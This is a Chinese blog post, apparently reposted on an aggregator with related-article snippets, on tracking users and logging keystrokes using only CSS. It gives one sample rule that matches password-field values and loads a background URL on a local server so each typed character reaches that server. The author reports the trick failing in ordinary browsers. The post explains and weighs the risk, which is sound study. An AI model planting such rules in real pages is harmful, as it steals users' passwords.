摘要:隨著這個(gè)思路,我自己嘗試了一下構(gòu)造選擇器去匹配用戶(hù)的輸入,選擇器語(yǔ)法參考另外在的幫助下也找到了用來(lái)獲取按鍵輸入的腳本,其實(shí)想法都差不多,腳本傳送門(mén)搜到的版本。
今天在看技術(shù)博客的時(shí)候發(fā)現(xiàn)這個(gè)帖子,感覺(jué)挺有趣的,于是就去挖了一下,問(wèn)題已經(jīng)是老問(wèn)題,但是還是有很多值得注意和學(xué)習(xí)的地方。
原文帖是 僅用CSS實(shí)現(xiàn)網(wǎng)頁(yè)追蹤分析,主要講的是通過(guò)CSS來(lái)記錄用戶(hù)的交互操作和獲取一些基本信息。我的第一感覺(jué)就是可以用來(lái)做推薦系統(tǒng)的用戶(hù)交互記錄,通過(guò)這種方式能夠記錄用戶(hù)鼠標(biāo)在哪些元素上懸停的時(shí)間,以及點(diǎn)擊的操作,等等。
瀏覽器熏染HTML文件是從上而下渲染的(需要加載完.css文件之后才會(huì)繼續(xù)向下渲染),要是加入許多這些追蹤用戶(hù)樣式的代碼可能會(huì)影響頁(yè)面的加載效率,但是要是有目的性的去使用這些功能,或許就比較值得了,比如說(shuō)記錄用戶(hù)的按鍵輸入。
隨著這個(gè)思路,我自己嘗試了一下構(gòu)造CSS選擇器去匹配用戶(hù)的輸入,CSS選擇器語(yǔ)法參考,另外在Google的幫助下也找到了用來(lái)獲取按鍵輸入的CSS腳本,其實(shí)想法都差不多,腳本傳送門(mén)-搜到的版本 CSS-Keylogging。
主要思路是通過(guò)類(lèi)似input[type="password"][value$="x"]{ background-image: url("http://localhost:3000/x"); }的方式來(lái)進(jìn)行獲取按鍵,意思就是input標(biāo)簽的type值為password的input中將value以x結(jié)尾的背景設(shè)置為url所指向的背景,但其實(shí)這個(gè)url不是圖片背景而是一個(gè)指向傳送按鍵信息的鏈接。之后你懂得通過(guò)服務(wù)端獲取url中的path就能取到值了。然后對(duì)每個(gè)按鍵到設(shè)置一個(gè)CSS腳本即可。
但其實(shí)這種方式我嘗試了很多次沒(méi)有成功,瀏覽器不會(huì)主動(dòng)將input中輸入的值存在value中,所以CSS匹配的一直是初始化狀態(tài)下的value屬性值,只有那些將value同步的框架才可能引發(fā)這些危害。
但是有一點(diǎn)可以確認(rèn),可以通過(guò)css中地url發(fā)送get請(qǐng)求。這讓我想到jsonp的原理,通過(guò)像構(gòu)造類(lèi)似script標(biāo)簽中地src屬性的方式來(lái)解決跨域問(wèn)題,要是不注意第三方庫(kù),很可能也存在這種惡意腳本的加載。
文章版權(quán)歸作者所有,未經(jīng)允許請(qǐng)勿轉(zhuǎn)載,若此文章存在違規(guī)行為,您可以聯(lián)系管理員刪除。
轉(zhuǎn)載請(qǐng)注明本文地址:http://specialneedsforspecialkids.com/yun/113890.html
摘要:隨著這個(gè)思路,我自己嘗試了一下構(gòu)造選擇器去匹配用戶(hù)的輸入,選擇器語(yǔ)法參考另外在的幫助下也找到了用來(lái)獲取按鍵輸入的腳本,其實(shí)想法都差不多,腳本傳送門(mén)搜到的版本。 今天在看技術(shù)博客的時(shí)候發(fā)現(xiàn)這個(gè)帖子,感覺(jué)挺有趣的,于是就去挖了一下,問(wèn)題已經(jīng)是老問(wèn)題,但是還是有很多值得注意和學(xué)習(xí)的地方。 showImg(https://segmentfault.com/img/bVbgudI?w=685&h...
摘要:寫(xiě)在前面月到這天,前端提升營(yíng),騰訊大佬們分享個(gè)人經(jīng)驗(yàn),使出各種前端方面的大招。并且減輕服務(wù)器的負(fù)擔(dān),的原則是按需取數(shù)據(jù),可以最大程度的減少冗余請(qǐng)求和響應(yīng)對(duì)服務(wù)器造成的負(fù)擔(dān)。控制表單控件的禁用狀態(tài)。 寫(xiě)在前面 5月24到30這7天,IMWeb前端提升營(yíng),騰訊大佬們分享個(gè)人經(jīng)驗(yàn),使出各種前端方面的大招。從中學(xué)習(xí)了很多前端方面的知識(shí),也get到了前端學(xué)習(xí)的方法論,還有一些算法知識(shí)等等。 現(xiàn)將...
摘要:后代選擇器,可以選擇子元素,卻沒(méi)法選擇父元素。這里說(shuō)的有關(guān)聯(lián)指的是相近或者相反,比如子選擇器和后代選擇器就是比較相近的如果要實(shí)現(xiàn)鼠標(biāo)相關(guān)的功能,可能就會(huì)聯(lián)想到等選擇器。 首先看一個(gè)效果,注意地址欄的變化 showImg(https://segmentfault.com/img/remote/1460000016937042?w=1058&h=433); 然后思考一下,用css如何實(shí)現(xiàn)?...
摘要:后代選擇器,可以選擇子元素,卻沒(méi)法選擇父元素。這里說(shuō)的有關(guān)聯(lián)指的是相近或者相反,比如子選擇器和后代選擇器就是比較相近的如果要實(shí)現(xiàn)鼠標(biāo)相關(guān)的功能,可能就會(huì)聯(lián)想到等選擇器。 首先看一個(gè)效果,注意地址欄的變化 showImg(https://segmentfault.com/img/remote/1460000016937042?w=1058&h=433); 然后思考一下,用css如何實(shí)現(xiàn)?...
閱讀 3723·2021-10-13 09:39
閱讀 3789·2021-09-24 09:48
閱讀 1189·2021-09-01 10:30
閱讀 2526·2019-08-30 15:55
閱讀 1774·2019-08-29 16:39
閱讀 2296·2019-08-26 13:55
閱讀 3050·2019-08-26 12:23
閱讀 1633·2019-08-26 11:59